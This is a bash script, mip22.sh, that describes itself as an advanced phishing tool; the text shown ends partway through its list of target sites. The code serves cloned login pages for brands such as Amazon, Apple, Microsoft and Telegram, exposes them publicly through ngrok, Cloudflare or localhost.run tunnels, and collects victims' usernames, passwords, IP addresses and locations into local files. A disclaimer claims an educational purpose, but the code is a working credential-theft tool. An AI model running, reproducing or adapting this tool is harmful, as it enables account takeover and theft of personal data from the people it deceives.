mip22.sh 35 KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210310410510610710810911011111211311411511611711811912012112212312412512612712812913013113213313413513613713813914014114214314414514614714814915015115215315415515615715815916016116216316416516616716816917017117217317417517617717817918018118218318418518618718818919019119219319419519619719819920020120220320420520620720820921021121221321421521621721821922022122222322422522622722822923023123223323423523623723823924024124224324424524624724824925025125225325425525625725825926026126226326426526626726826927027127227327427527627727827928028128228328428528628728828929029129229329429529629729829930030130230330430530630730830931031131231331431531631731831932032132232332432532632732832933033133233333433533633733833934034134234334434534634734834935035135235335435535635735835936036136236336436536636736836937037137237337437537637737837938038138238338438538638738838939039139239339439539639739839940040140240340440540640740840941041141241341441541641741841942042142242342442542642742842943043143243343443543643743843944044144244344444544644744844945045145245345445545645745845946046146246346446546646746846947047147247347447547647747847948048148248348448548648748848949049149249349449549649749849950050150250350450550650750850951051151251351451551651751851952052152252352452552652752852953053153253353453553653753853954054154254354454554654754854955055155255355455555655755855956056156256356456556656756856957057157257357457557657757857958058158258358458558658758858959059159259359459559659759859960060160260360460560660760860961061161261361461561661761861962062162262362462562662762862963063163263363463563663763863964064164264364464564664764864965065165265365465565665765865966066166266366466566666766866967067167267367467567667767867968068168268368468568668768868969069169269369469569669769869970070170270370470570670770870971071171271371471571671771871972072172272372472572672772872973073173273373473573673773873974074174274374474574674774874975075175275375475575675775875976076176276376476576676776876977077177277377477577677777877978078178278378478578678778878979079179279379479579679779879980080180280380480580680780880981081181281381481581681781881982082182282382482582682782882983083183283383483583683783883984084184284384484584684784884985085185285385485585685785885986086186286386486586686786886987087187287387487587687787887988088188288388488588688788888989089189289389489589689789889990090190290390490590690790890991091191291391491591691791891992092192292392492592692792892993093193293393493593693793893994094194294394494594694794894995095195295395495595695795895996096196296396496596696796896997097197297397497597697797897998098198298398498598698798898999099199299399499599699799899910001001100210031004100510061007100810091010101110121013101410151016101710181019102010211022102310241025102610271028102910301031103210331034103510361037103810391040104110421043104410451046104710481049105010511052105310541055105610571058105910601061106210631064106510661067106810691070107110721073107410751076107710781079108010811082108310841085108610871088108910901091109210931094109510961097109810991100110111021103110411051106110711081109111011111112111311141115111611171118111911201121112211231124112511261127112811291130113111321133113411351136113711381139114011411142114311441145114611471148114911501151115211531154115511561157115811591160116111621163116411651166116711681169117011711172117311741175117611771178117911801181118211831184118511861187118811891190119111921193119411951196119711981199120012011202120312041205120612071208120912101211121212131214121512161217121812191220122112221223122412251226122712281229123012311232123312341235123612371238123912401241124212431244124512461247124812491250125112521253125412551256125712581259126012611262126312641265126612671268126912701271127212731274127512761277127812791280128112821283128412851286128712881289129012911292129312941295129612971298129913001301130213031304130513061307130813091310131113121313131413151316131713181319132013211322132313241325132613271328132913301331133213331334133513361337133813391340134113421343134413451346134713481349135013511352135313541355
  1. #!/bin/bash
  2. #
  3. # Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
  4. # mip22 is a advanced phishing tool.
  5. #
  6. # mip22 is free software: you can redistribute it and/or modify
  7. # it under the terms of the GNU Affero General Public License as published by
  8. # the Free Software Foundation, either version 3 of the License, or
  9. # (at your option) any later version.
  10. #
  11. # mip22 is distributed in the hope that it will be useful,
  12. # but WITHOUT ANY WARRANTY; without even the implied warranty of
  13. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  14. # GNU Affero General Public License for more details.
  15. #
  16. # You should have received a copy of the GNU Affero General Public License
  17. # along with this program. If not, see <http://www.gnu.org/licenses/>.
  18. #
  19. #
  20. #permissions
  21. chmod -R 777 packages.sh
  22. chmod -R 777 tunnels.sh
  23. chmod -R 777 data.txt
  24. chmod -R 777 fingerprints.txt
  25. chmod -R 777 .host
  26. chmod -R 777 .manual_attack
  27. chmod -R 777 .music
  28. chmod -R 777 .pages
  29. chmod -R 777 .tunnels_log
  30. chmod -R 777 .www
  31. #Install packages and tunnels
  32. check_os_and_install_packages() {
  33. if [[ -f .host/ngrok && -f .host/cloudflared ]]; then
  34. { clear; }
  35. else
  36. { clear; header; }
  37. OS_SYSTEM=$(uname -o)
  38. if [ $OS_SYSTEM != Android ]; then
  39. bash packages.sh
  40. bash tunnels.sh
  41. else
  42. ./packages.sh
  43. ./tunnels.sh
  44. fi
  45. fi
  46. }
  47. # Check os for root
  48. check_root_and_os() {
  49. OS_SYSTEM=$(uname -o)
  50. if [ $OS_SYSTEM != Android ]; then
  51. if [[ "${EUID:-$(id -u)}" -ne 0 ]]; then
  52. { clear; header; }
  53. echo -e "The program cannot run.\nFor run program in GNU/Linux Operating System,\nGive root privileges and try again. \n"
  54. exit 1
  55. fi
  56. fi
  57. }
  58. # Terminal Colors
  59. RED="$(printf '\033[31m')"
  60. GREEN="$(printf '\033[32m')"
  61. ORANGE="$(printf '\033[33m')"
  62. BLUE="$(printf '\033[34m')"
  63. MAGENTA="$(printf '\033[35m')"
  64. CYAN="$(printf '\033[36m')"
  65. WHITE="$(printf '\033[37m')"
  66. BLACK="$(printf '\033[30m')"
  67. ORANGEBG="$(printf '\033[43m')"
  68. BLUEBG="$(printf '\033[44m')"
  69. RESETFG="$(printf '\e033[0m')"
  70. RESETBG="$(printf '\e[0m\n')"
  71. # Directories
  72. if [[ ! -d ".host" ]]; then
  73. mkdir -p ".host"
  74. fi
  75. if [[ ! -d ".www" ]]; then
  76. mkdir -p ".www"
  77. fi
  78. # Clear content of log files
  79. truncate -s 0 .tunnels_log/.cloudfl.log
  80. truncate -s 0 .tunnels_log/.localrun.log
  81. pid_kill() {
  82. #kill all pid for php, ngrok and cloudflared
  83. if [[ `pidof php` ]]; then
  84. killall php > /dev/null 2>&1
  85. fi
  86. if [[ `pidof ngrok` ]]; then
  87. killall ngrok > /dev/null 2>&1
  88. fi
  89. if [[ `pidof cloudflared` ]]; then
  90. killall cloudflared > /dev/null 2>&1
  91. fi
  92. }
  93. header(){
  94. printf "${BLUE}"
  95. cat <<- EOF
  96. ${BLUE} ███╗ ███╗██╗███████╗███████╗██╗ ██████╗ ███╗ ██╗███████╗
  97. ${BLUE} ████╗ ████║██║██╔════╝██╔════╝██║██╔═══██╗████╗ ██║██╔════╝
  98. ${BLUE} ██╔████╔██║██║███████╗███████╗██║██║ ██║██╔██╗ ██║███████╗ ${RED} o
  99. ${BLUE} ██║╚██╔╝██║██║╚════██║╚════██║██║██║ ██║██║╚██╗██║╚════██║ ${RED} d8b
  100. ${BLUE} ██║ ╚═╝ ██║██║███████║███████║██║╚██████╔╝██║ ╚████║███████║ ${RED} d888b
  101. ${BLUE} ╚═╝ ╚═╝╚═╝╚══════╝╚══════╝╚═╝ ╚═════╝ ╚═╝ ╚═══╝╚══════╝ ${RED}"Y888888888P"
  102. ${BLUE} ██╗███╗ ███╗██████╗ ██████╗ ███████╗███████╗██╗██████╗ ██╗ ███████╗███████╗ ${RED} "Y88888P"
  103. ${BLUE} ██║████╗ ████║██╔══██╗██╔═══██╗██╔════╝██╔════╝██║██╔══██╗██║ ██╔════╝██╔════╝ ${RED} d88P"Y88b
  104. ${BLUE} ██║██╔████╔██║██████╔╝██║ ██║███████╗███████╗██║██████╔╝██║ █████╗ ███████╗ ${RED}dP" "Yb
  105. ${BLUE} ██║██║╚██╔╝██║██╔═══╝ ██║ ██║╚════██║╚════██║██║██╔══██╗██║ ██╔══╝ ╚════██║
  106. ${BLUE} ██║██║ ╚═╝ ██║██║ ╚██████╔╝███████║███████║██║██████╔╝███████╗███████╗███████║
  107. ${BLUE} ═╝╚═╝ ╚═╝╚═╝ ╚═════╝ ╚══════╝╚══════╝╚═╝╚═════╝ ╚══════╝╚══════╝╚══════╝
  108. ${CYAN}Mip tool made for educational purpose only. ${ORANGE}Version: 1.0
  109. ${CYAN}The author is not responsible for any malicious use of the program.
  110. ${CYAN} Mip Created by ${ORANGE}makdosx ${CYAN}(https://github.com/makdosx) ${WHITE}
  111. EOF
  112. printf "${RESETBG}"
  113. }
  114. # Php webserver and port
  115. host='127.0.0.1'
  116. port='8080'
  117. setup_clone(){
  118. # Setup cloned page and server
  119. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${BLUE} Setting up cloned page..."${WHITE}
  120. rm -rf .www/*
  121. cp -rf .pages/"$site"/* .www
  122. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${BLUE} Starting your php server..."${WHITE}
  123. cd .www && php -S "$host":"$port" > /dev/null 2>&1 &
  124. }
  125. setup_clone_manual() {
  126. rm -rf .www/*
  127. cp -rf .manual_attack/index.html .www
  128. cp -rf .manual_attack/post.php .www
  129. cp -rf .manual_attack/data.txt .www
  130. cp -rf .manual_attack/__ROOT__/index.php .www
  131. cp -rf .manual_attack/__ROOT__/fingerprints.php .www
  132. rm -rf .manual_attack/index.html
  133. rm -rf .manual_attack/post.php
  134. rm -rf .manual_attack/data.txt
  135. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${BLUE} Starting your php server..."${WHITE}
  136. cd .www && php -S "$host":"$port" > /dev/null 2>&1 &
  137. }
  138. ## Get IP address
  139. get_fingerprints() {
  140. IP=$(grep -a 'IP:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  141. Full_Date=$(grep -a 'Full-Date:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  142. Country=$(grep -a 'Country:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  143. Region=$(grep -a 'Region:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  144. City=$(grep -a 'City:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  145. User_Agent=$(grep -a 'User-Agent:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  146. OS_System=$(grep -a 'OS-System:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  147. IFS=$'\n'
  148. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Victim Fingerprints.. "
  149. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} IP: ${BLUE}$IP"
  150. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Full Date: ${BLUE}$Full_Date"
  151. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Country: ${BLUE}$Country"
  152. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Region: ${BLUE}$Region"
  153. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} City: ${BLUE}$City"
  154. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} User-Agent: ${BLUE}$User_Agent"
  155. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} OS System: ${BLUE}$OS_System"
  156. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${BLUE} Saved in : ${MAGENTA}fingerprints.txt"
  157. cat .www/fingerprints.txt >> fingerprints.txt
  158. }
  159. # Get credentials from victims
  160. get_creds() {
  161. ACC=$(grep -o 'Username:.*' .www/data.txt | cut -d " " -f2)
  162. PASS=$(grep -o 'Password:.*' .www/data.txt | cut -d ":" -f2)
  163. IFS=$'\n'
  164. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Account : ${WHITE}$ACC"
  165. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Password : ${WHITE}$PASS"
  166. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Saved in : ${ORANGE}data.txt"
  167. cat .www/data.txt >> data.txt
  168. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Waiting for Next Fingerptints and Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit. "
  169. }
  170. # Get credentials from victims manual method
  171. get_creds_manual() {
  172. ACC=$(tail -n 20 .www/data.txt)
  173. IFS=$'\n'
  174. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Account : ${WHITE}$ACC"
  175. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Saved in : ${ORANGE}data.txt"
  176. cat .www/data.txt >> data.txt
  177. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Waiting for Next Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit. "
  178. }
  179. # Print credentials from victim
  180. credentials() {
  181. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Waiting for Victim fingerprints and Login Info.. ${BLUE}Ctrl + C ${MAGENTA}to exit..."
  182. while true; do
  183. if [[ -e ".www/fingerprints.txt" ]]; then
  184. echo -e "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Fingerprints Victim Found!"
  185. get_fingerprints
  186. rm -rf .www/fingerprints.txt
  187. fi
  188. sleep 0.75
  189. if [[ -e ".www/data.txt" ]]; then
  190. echo -e "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Login info Found !"
  191. get_creds
  192. rm -rf .www/data.txt
  193. fi
  194. sleep 0.75
  195. done
  196. }
  197. # Print credentials from victim manual
  198. credentials_manual() {
  199. while true; do
  200. if [[ -e ".www/fingerprints.txt" ]]; then
  201. echo -e "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Fingerprints Victim Found!"
  202. get_fingerprints
  203. rm -rf .www/fingerprints.txt
  204. fi
  205. sleep 0.75
  206. if [[ -e ".www/data.txt" ]]; then
  207. echo -e "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Login info Found !"
  208. get_creds_manual
  209. rm -rf .www/data.txt
  210. fi
  211. sleep 0.75
  212. done
  213. }
  214. # Localhost Start
  215. localhost_start() {
  216. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${GREEN}( ${CYAN}http://$host:$port ${GREEN})"
  217. setup_clone
  218. { sleep 1; clear; header; }
  219. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Successfully Hosted in : ${GREEN}${CYAN}http://$host:$port ${GREEN}"
  220. credentials
  221. }
  222. # Localhost Start
  223. localhost_start_manual() {
  224. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${GREEN}( ${CYAN}http://$host:$port ${GREEN})"
  225. setup_clone_manual
  226. { sleep 1; clear; header; }
  227. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Successfully Hosted in : ${GREEN}${CYAN}http://$host:$port ${GREEN}"
  228. credentials_manual
  229. }
  230. #ngrok token setup
  231. ngrok_setup_token() {
  232. { clear; header; echo; }
  233. cat <<- EOF
  234. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Ngrok Toekn
  235. ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
  236. EOF
  237. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select Api : ${WHITE}"${WHITE}
  238. case $REPLY in
  239. 1)
  240. echo "Please insert yout ngrok authtoken (only key):"
  241. read authtoken
  242. if [[ `command -v termux-chroot` ]]; then
  243. termux-chroot ./.host/ngrok authtoken $authtoken
  244. sleep 2 && menu
  245. else
  246. ./.host/ngrok authtoken $authtoken
  247. sleep 2 && menu
  248. fi ;;
  249. 99) menu;;
  250. *)
  251. echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
  252. { sleep 0.7; ngrok_setup_token;};;
  253. esac
  254. }
  255. apis() {
  256. { clear; header; echo; }
  257. cat <<- EOF
  258. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Ngrok
  259. ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
  260. EOF
  261. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select Api : ${WHITE}"${WHITE}
  262. case $REPLY in
  263. 1) ngrok_setup_token;;
  264. 99) menu;;
  265. *)
  266. echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Api, Try Again..."
  267. { sleep 0.7; apis;};;
  268. esac
  269. }
  270. # Start ngrok
  271. ngrok_start() {
  272. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${MAGENTA})"
  273. { sleep 1; setup_clone; }
  274. echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching Ngrok..."
  275. if [[ `command -v termux-chroot` ]]; then
  276. sleep 2 && termux-chroot ./.host/ngrok http "$host":"$port" > /dev/null 2>&1 &
  277. else
  278. sleep 2 && ./.host/ngrok http "$host":"$port" > /dev/null 2>&1 &
  279. fi
  280. { sleep 9; clear; header; }
  281. ngrok_url=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[-0-9a-z]*\.ngrok.io")
  282. ngrok_url1=${ngrok_url#https://}
  283. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$ngrok_url1"
  284. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http(s) : ${GREEN}$ngrok_url"
  285. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$ngrok_url1"
  286. credentials
  287. }
  288. # Start ngrok
  289. ngrok_start_manual() {
  290. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${MAGENTA})"
  291. { sleep 1; setup_clone_manual; }
  292. echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching Ngrok..."
  293. if [[ `command -v termux-chroot` ]]; then
  294. sleep 2 && termux-chroot ./.host/ngrok http "$host":"$port" > /dev/null 2>&1 &
  295. else
  296. sleep 2 && ./.host/ngrok http "$host":"$port" > /dev/null 2>&1 &
  297. fi
  298. { sleep 9; clear; header; }
  299. ngrok_url=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[-0-9a-z]*\.ngrok.io")
  300. ngrok_url1=${ngrok_url#https://}
  301. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$ngrok_url1"
  302. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http(s) : ${GREEN}$ngrok_url"
  303. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$ngrok_url1"
  304. credentials_manual
  305. }
  306. # Start Cloudflared
  307. #
  308. cloudflared_start() {
  309. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${GREEN})"
  310. { sleep 1; setup_clone; }
  311. echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGETNA} Launching Cloudflared..."
  312. if [[ `command -v termux-chroot` ]]; then
  313. sleep 2 && termux-chroot ./.host/cloudflared tunnel -url "$host":"$port" > .tunnels_log/.cloudfl.log 2>&1 & > /dev/null 2>&1 &
  314. else
  315. sleep 2 && ./.host/cloudflared tunnel -url "$host":"$port" > .tunnels_log/.cloudfl.log 2>&1 & > /dev/null 2>&1 &
  316. fi
  317. { sleep 9; clear; header; }
  318. cldflr_url=$(grep -o 'https://[-0-9a-z]*\.trycloudflare.com' ".tunnels_log/.cloudfl.log")
  319. cldflr_url1=${cldflr_url#https://}
  320. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$cldflr_url1"
  321. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http(s) : ${GREEN}$cldflr_url"
  322. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$cldflr_url1"
  323. credentials
  324. }
  325. # Start Cloudflared
  326. #
  327. cloudflared_start_manual() {
  328. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${GREEN})"
  329. { sleep 1; setup_clone_manual; }
  330. echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching Cloudflared..."
  331. if [[ `command -v termux-chroot` ]]; then
  332. sleep 2 && termux-chroot ./.host/cloudflared tunnel -url "$host":"$port" > .tunnels_log/.cloudfl.log 2>&1 & > /dev/null 2>&1 &
  333. else
  334. sleep 2 && ./.host/cloudflared tunnel -url "$host":"$port" > .tunnels_log/.cloudfl.log 2>&1 & > /dev/null 2>&1 &
  335. fi
  336. { sleep 9; clear; header; }
  337. cldflr_url=$(grep -o 'https://[-0-9a-z]*\.trycloudflare.com' ".tunnels_log/.cloudfl.log")
  338. cldflr_url1=${cldflr_url#https://}
  339. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$cldflr_url1"
  340. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http(s) : ${GREEN}$cldflr_url"
  341. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$cldflr_url1"
  342. credentials_manual
  343. }
  344. # Start localrun
  345. localhostrun_start() {
  346. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${MAGENTA})"
  347. { sleep 1; setup_clone; }
  348. echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching LocalhostRun..."
  349. if [[ `command -v termux-chroot` ]]; then
  350. sleep 2 && termux-chroot ssh -R "80":"$host":"$port" "nokey@localhost.run" > .tunnels_log/.localrun.log 2>&1 & > /dev/null 2>&1 &
  351. else
  352. sleep 2 && ssh -R "80":"$host":"$port" "nokey@localhost.run" > .tunnels_log/.localrun.log 2>&1 & > /dev/null 2>&1 &
  353. fi
  354. { sleep 9; clear; header; }
  355. localrun_url=$(grep -o 'https://[-0-9a-z]*\.lhrtunnel.link' ".tunnels_log/.localrun.log")
  356. localrun_url1=${localrun_url#https://}
  357. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$localrun_url1"
  358. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL https(s) : ${GREEN}$localrun_url"
  359. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$localrun_url1"
  360. credentials
  361. }
  362. # Start localrun
  363. localhostrun_start_manual() {
  364. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${MAGENTA})"
  365. { sleep 1; setup_clone_manual; }
  366. echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching LocalhostRun..."
  367. if [[ `command -v termux-chroot` ]]; then
  368. sleep 2 && termux-chroot ssh -R "80":"$host":"$port" "nokey@localhost.run" > .tunnels_log/.localrun.log 2>&1 & > /dev/null 2>&1 &
  369. else
  370. sleep 2 && ssh -R "80":"$host":"$port" "nokey@localhost.run" > .tunnels_log/.localrun.log 2>&1 & > /dev/null 2>&1 &
  371. fi
  372. { sleep 9; clear; header; }
  373. localrun_url=$(grep -o 'https://[-0-9a-z]*\.lhrtunnel.link' ".tunnels_log/.localrun.log")
  374. localrun_url1=${localrun_url#https://}
  375. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$localrun_url1"
  376. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL https(s) : ${GREEN}$localrun_url"
  377. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$localrun_url1"
  378. credentials_manual
  379. }
  380. # Select Tunnel
  381. tunnel() {
  382. { clear; header; }
  383. cat <<- EOF
  384. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Localhost ${MAGENTA} (for practise only)
  385. ${GREEN}[${WHITE}2${GREEN}]${CYAN} LocalhostRun ${MAGENTA} (alternative)
  386. ${GREEN}[${WHITE}3${GREEN}]${CYAN} Cloudflared ${MAGENTA} (recommended)
  387. ${GREEN}[${WHITE}4${GREEN}]${CYAN} Ngrok ${MAGENTA} (first install token from menu)
  388. EOF
  389. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select a port forwarding service : ${WHITE}"
  390. case $REPLY in
  391. 1)
  392. localhost_start;;
  393. 2)
  394. localhostrun_start;;
  395. 3)
  396. cloudflared_start;;
  397. 4)
  398. ngrok_start;;
  399. *)
  400. echo -ne "\n${GREEN}[${WHITE}!${GREEN}]${RED} Invalid Option, Try Again..."
  401. { sleep 1; header; tunnel;};;
  402. esac
  403. }
  404. start_manual_method() {
  405. cd .manual_attack && php -S "127.0.0.1:8081" > /dev/null 2>&1 &
  406. echo -e "\n${GREEN}[${WHITE}-${GREEN}] ${GREEN} Visit ${WHITE} http://127.0.0.1:8081 ${GREEN} for setup clone page "${WHITE}
  407. echo -e "\n${GREEN}[${WHITE}-${GREEN}] ${GREEN} After setup clone page return to here and continue... "${WHITE}
  408. }
  409. # Select Tunnel
  410. tunnel_manual() {
  411. { clear; header; }
  412. start_manual_method
  413. cat <<- EOF
  414. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Localhost ${MAGENTA} (for practise only)
  415. ${GREEN}[${WHITE}2${GREEN}]${CYAN} LocalhostRun ${MAGENTA} (alternative)
  416. ${GREEN}[${WHITE}3${GREEN}]${CYAN} Cloudflared ${MAGENTA} (recommended)
  417. ${GREEN}[${WHITE}4${GREEN}]${CYAN} Ngrok ${MAGENTA} (first install token from menu)
  418. EOF
  419. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select a port forwarding service : ${WHITE}"
  420. case $REPLY in
  421. 1)
  422. localhost_start_manual;;
  423. 2)
  424. localhostrun_start_manual;;
  425. 3)
  426. cloudflared_start_manual;;
  427. 4)
  428. ngrok_start_manual;;
  429. *)
  430. echo -ne "\n${GREEN}[${WHITE}!${GREEN}]${RED} Invalid Option, Try Again..."
  431. { sleep 1; header; tunnel;};;
  432. esac
  433. }
  434. vpn_setup() {
  435. { clear; header; echo; }
  436. cat <<- EOF
  437. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Psiphon Vpn
  438. ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
  439. EOF
  440. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select Api : ${WHITE}"${WHITE}
  441. case $REPLY in
  442. 1)
  443. if [[ `command -v termux-chroot` ]]; then
  444. echo "https://play.google.com/store/apps/details?id=com.psiphon3.subscription"
  445. sleep 4 && menu
  446. else
  447. echo "https://play.google.com/store/apps/details?id=com.psiphon3.subscription"
  448. #echo 'Not Supported. Setup your vpn manual'
  449. sleep 4 && menu
  450. fi ;;
  451. 99) menu;;
  452. *)
  453. echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
  454. { sleep 0.7; ngrok_setup_token;};;
  455. esac
  456. }
  457. play_music() {
  458. { clear; header; }
  459. cat <<- EOF
  460. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Play Music
  461. ${GREEN}[${WHITE}2${GREEN}]${CYAN} Stop Music
  462. ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
  463. ${MAGENTA} If you select this option which is the background music then you may
  464. ${MAGENTA} not see the attacker's details directly in the terminal.
  465. ${MAGENTA} If you not seen the data pause the music and restart the program again.
  466. ${MAGENTA} However, they have been saved in the data txt file.
  467. EOF
  468. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select Option : ${WHITE}"${WHITE}
  469. case $REPLY in
  470. 1)
  471. xterm -e nohup mpv .music/mis_song.mp3 > /dev/null 2>&1
  472. menu;;
  473. 2)
  474. pidof mpv && killall mpv > /dev/null 2>&1
  475. menu;;
  476. 99)
  477. menu;;
  478. *)
  479. echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again...";;
  480. esac
  481. }
  482. attack() {
  483. { clear; header; echo; }
  484. cat <<- EOF
  485. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Adobe ${GREEN}[${WHITE}25${GREEN}]${CYAN} Line ${GREEN}[${WHITE}48${GREEN}]${CYAN} Socialclub
  486. ${GREEN}[${WHITE}2${GREEN}]${CYAN} Amazon ${GREEN}[${WHITE}26${GREEN}]${CYAN} LinkedIn ${GREEN}[${WHITE}49${GREEN}]${CYAN} Spotify
  487. ${GREEN}[${WHITE}3${GREEN}]${CYAN} Apple ${GREEN}[${WHITE}27${GREEN}]${CYAN} Livejournal ${GREEN}[${WHITE}50${GREEN}]${CYAN} Stackoverflow
  488. ${GREEN}[${WHITE}4${GREEN}]${CYAN} Baddo ${GREEN}[${WHITE}28${GREEN}]${CYAN} Mediafire ${GREEN}[${WHITE}51${GREEN}]${CYAN} Steam
  489. ${GREEN}[${WHITE}5${GREEN}]${CYAN} Care2 ${GREEN}[${WHITE}29${GREEN}]${CYAN} MeWe ${GREEN}[${WHITE}52${GREEN}]${CYAN} Tagged
  490. ${GREEN}[${WHITE}6${GREEN}]${CYAN} Clashofclans ${GREEN}[${WHITE}30${GREEN}]${CYAN} Microsoft ${GREEN}[${WHITE}53${GREEN}]${CYAN} Telegram
  491. ${GREEN}[${WHITE}7${GREEN}]${CYAN} Crunchyroll ${GREEN}[${WHITE}31${GREEN}]${CYAN} Mocospace ${GREEN}[${WHITE}54${GREEN}]${CYAN} Tiktok
  492. ${GREEN}[${WHITE}8${GREEN}]${CYAN} Deviantart ${GREEN}[${WHITE}32${GREEN}]${CYAN} Myspace ${GREEN}[${WHITE}55${GREEN}]${CYAN} Tiktok Followers
